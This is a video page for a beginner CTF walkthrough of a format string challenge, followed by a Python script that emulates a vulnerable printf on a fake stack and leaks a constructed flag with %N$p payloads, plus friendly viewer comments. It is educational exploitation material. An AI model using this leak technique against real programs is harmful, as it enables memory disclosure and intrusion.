Format String Vulnerability - "Floor Mat Store" [INTIGRITI 1337UP LIVE CTF 2023]

  • Published 20 Jul 2024
  • Video walkthrough for "Floor Mat Store", a binary exploitation challenge I made for the @intigriti 1337UP LIVE CTF 2023. It was a fairly standard pwn challenge, requiring players to exploit a format string vulnerability (damn you printf *shakes fist at computer*). I tried to add some small twists and give it a theme to keep it interesting! Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂 #INTIGRITI #CTF #Pwn #BinaryExploitation #BugBounty
    ↢Social Media↣
    Twitter: / _cryptocat
    GitHub: github.com/Crypto-Cat/CTF
    HackTheBox: app.hackthebox.eu/profile/11897
    LinkedIn: / cryptocat
    Reddit: / _cryptocat23
    UA-cam: / cryptocat23
    Twitch: / cryptocat23
    ↢INTIGRITI 1337UPLIVE CTF↣
    ctftime.org/event/2134
    ctf.intigriti.io
    go.intigriti.com/discord
    ↢Resources↣
    Ghidra: ghidra-sre.org/CheatSheet.html
    Volatility: github.com/volatilityfoundati...
    PwnTools: github.com/Gallopsled/pwntool...
    CyberChef: gchq.github.io/CyberChef
    DCode: www.dcode.fr/en
    HackTricks: book.hacktricks.xyz/pentestin...
    CTF Tools: github.com/apsdehal/awesome-ctf
    Forensics: cugu.github.io/awesome-forensics
    Decompile Code: www.decompiler.com
    Run Code: tio.run
    ↢Chapters↣
    0:00 Start
    0:50 Basic file checks
    3:48 Explore functionality
    4:57 Identify format string vulnerability
    9:38 PwnTools script
    12:48 Disassemble with Ghidra
    15:05 Leak flag
    16:34 Challenge source code
    17:46 End
  • Science & Technology
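The "Identify format string vulnerability" and "Leak flag" steps above come down to one idea: when a program passes user input straight to printf, the attacker's `%N$p` conversions read the Nth 8-byte word off the stack, and if the flag was read into a stack buffer, those words spell it out. The script below is an added example, not the author's solve script or the challenge code: the challenge binary is replaced by an emulated target with a constructed flag at a made-up stack position, and the `send` callback stands in for the `io.sendline()`/`io.recvline()` pair a pwntools script would use against the real process.

```python
import re
import struct

# Constructed sample flag for the emulated target; not the real challenge flag.
FLAG = b"INTIGRITI{fake_flag_for_demo}"

# ----- Emulated vulnerable target (stands in for the challenge binary) -----

def build_fake_stack(flag: bytes, flag_offset: int = 6) -> list[int]:
    """Return the 8-byte words a vulnerable printf(user_input) would read for
    %1$p, %2$p, ...  Words before flag_offset hold made-up pointer values; the
    flag's bytes then follow, packed little-endian as they would sit in a local
    buffer on an x86-64 stack, followed by one zero word.  The offset 6 is an
    assumption for the demo, not the real challenge's layout."""
    stack = [0x7FFD_1234_5678_0000 + i * 8 for i in range(1, flag_offset)]
    padded = flag + b"\x00" * (-len(flag) % 8)
    for i in range(0, len(padded), 8):
        stack.append(struct.unpack("<Q", padded[i:i + 8])[0])
    stack.append(0)
    return stack

_DIRECT_PARAM = re.compile(r"%(\d+)\$p")

def vulnerable_printf(fmt: str, stack: list[int]) -> str:
    """Emulate the slice of printf behaviour the exploit relies on: '%N$p'
    (POSIX direct parameter access) prints the N-th word as hex and any other
    text is echoed.  A real printf reading past its arguments is undefined
    behaviour; on x86-64 in practice it walks the caller's stack, which is
    exactly what this word table models."""
    out, last = [], 0
    for m in _DIRECT_PARAM.finditer(fmt):
        out.append(fmt[last:m.start()])
        n = int(m.group(1))
        out.append(hex(stack[n - 1]) if 1 <= n <= len(stack) else "(nil)")
        last = m.end()
    out.append(fmt[last:])
    return "".join(out)

# ----- Exploit side (what the pwntools script does) -----

def leak_word(send, n: int) -> int:
    """Leak the N-th stack word.  `send` takes a payload string and returns the
    program's response; with pwntools it would wrap io.sendline()/io.recvline().
    The LEAK:/:END markers make the leaked value easy to pick out of the output."""
    resp = send(f"LEAK:%{n}$p:END")
    m = re.search(r"LEAK:(0x[0-9a-fA-F]+|\(nil\)):END", resp)
    if m is None:
        raise ValueError(f"no leak in response: {resp!r}")
    return 0 if m.group(1) == "(nil)" else int(m.group(1), 16)

def find_flag_offset(send, prefix: bytes = b"INTIGRITI", max_pos: int = 40):
    """Scan positions 1..max_pos for the word whose bytes start the flag.
    Each leaked word is unpacked little-endian, so the text reads forwards."""
    for n in range(1, max_pos + 1):
        raw = struct.pack("<Q", leak_word(send, n))
        if raw.startswith(prefix[:8]):
            return n
    return None

def recover_flag(send, start: int, max_words: int = 16) -> bytes:
    """Read consecutive words from `start` until a NUL byte ends the string."""
    flag = b""
    for n in range(start, start + max_words):
        raw = struct.pack("<Q", leak_word(send, n))
        if b"\x00" in raw:
            return flag + raw.split(b"\x00", 1)[0]
        flag += raw
    return flag

if __name__ == "__main__":
    stack = build_fake_stack(FLAG, flag_offset=6)
    send = lambda payload: vulnerable_printf(payload, stack)
    offset = find_flag_offset(send)
    print(f"flag starts at stack position {offset}")
    print(recover_flag(send, offset).decode())
```

Two practical points the emulation preserves: `%p` is used rather than `%s` because `%p` prints the raw word wherever it points, while `%N$s` dereferences it and will crash the target on the first word that is not a valid pointer; and the words are unpacked little-endian, so the text appears in order even though each leaked hex value looks reversed on screen.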

COMMENTS • 6

  • @Erubius37
    @Erubius37 7 months ago +2

    (/.\) the checksum protections are OBVI a hint not to try to force your way past them, who would’ve made an inference the other way? Couldn’t have been me….
    But thank you for the video, Crypto! Will be adding a lot of the lessons learned to my notes for future growth

    • @_CryptoCat
      @_CryptoCat  7 months ago +3

      rule of thumb is:
      - weak binary protections, lots of solves = probably buffer overflow
      - strong binary protections, lots of solves = probably NOT buffer overflow
      - strong binary protections, very little solves = i quit 😆

    • @oussamaboustani6873
      @oussamaboustani6873 5 months ago +1

      Such a great explanation man!
      Binary exp is a bit hard, especially when you're getting into heap exp, GOT overwrite, bypassing stack cookies...
      It needs a good concentration and a good knowledge of the system architecture.
      Keep up the good work Crypto!

    • @_CryptoCat
      @_CryptoCat  5 months ago

      @oussamaboustani6873 Thanks! You're right, it's a super niche area and requires a lot of foundational knowledge, time and patience 🧠

  • @eyezikandexploits
    @eyezikandexploits 4 months ago +1

    Man, I just found you and I'm so glad I did, keep it up. You got Discord?

    • @_CryptoCat
      @_CryptoCat  4 months ago +1

      Yes bro! I moderate the Intigriti Discord @ go.intigriti.com, come join 🙂